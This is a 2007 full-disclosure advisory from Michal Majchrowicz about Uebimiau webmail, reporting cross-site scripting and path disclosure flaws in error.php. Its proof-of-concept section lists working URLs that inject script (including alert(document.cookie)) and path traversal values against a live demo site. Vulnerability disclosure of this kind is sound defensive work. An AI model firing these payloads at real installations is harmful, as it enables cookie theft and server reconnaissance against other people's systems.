Computer Security

Security Advisory: [Full-disclosure] Uebimiau Webmail Multiple Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [MajorSecurity Advisory #48]eggblog - Session fixation Issue

  Re: DGNews version 2.1 SQL Injection Vulnerability

  DGNews version 2.1 Path Disclosure Vulnerability

  DGNews version 2.1 SQL Injection Vulnerability

From:Michal Majchrowicz <m.majchrowicz_(at)_gmail.com>
Date:29.05.2007
Subject:[Full-disclosure] Uebimiau Webmail Multiple Vulnerabilities

Synopsis: Multiple Vulnerabilities

Introduction:
Uebimiau is an open source webmail interface.

Details:
Uebimiau doesn't correctly handle the $_GET array in error.php. Many
vulnerabilities have been already discovered, but I would like to introduce
few new ones:
1) XSS
2) Three Web Server Directory Path Disclosure Vulnerabilities
3) Directory Existence Vulnerability

PoC:
<http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert%
28%22XSS%22%29%3C/script%3E?subject=server&server=test>

http://www.uebimiau.org/demo/pop3/error.php?selected_theme=%3Cscript%3Eal
ert(document.cookie)%3C/script%3E
http://www.uebimiau.org/demo/pop3/error.php?smarty=test
http://www.uebimiau.org/demo/pop3/error.php?selected_theme=test
http://www.uebimiau.org/demo/pop3/error.php?selected_theme=:
http://www.uebimiau.org/demo/pop3/error.php?selected_theme=/etc/apache2/../../var
/www/web6/web/demo/pop3/themes/uebimiau/

Regards Michal Majchrowicz.
Hack.pl
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server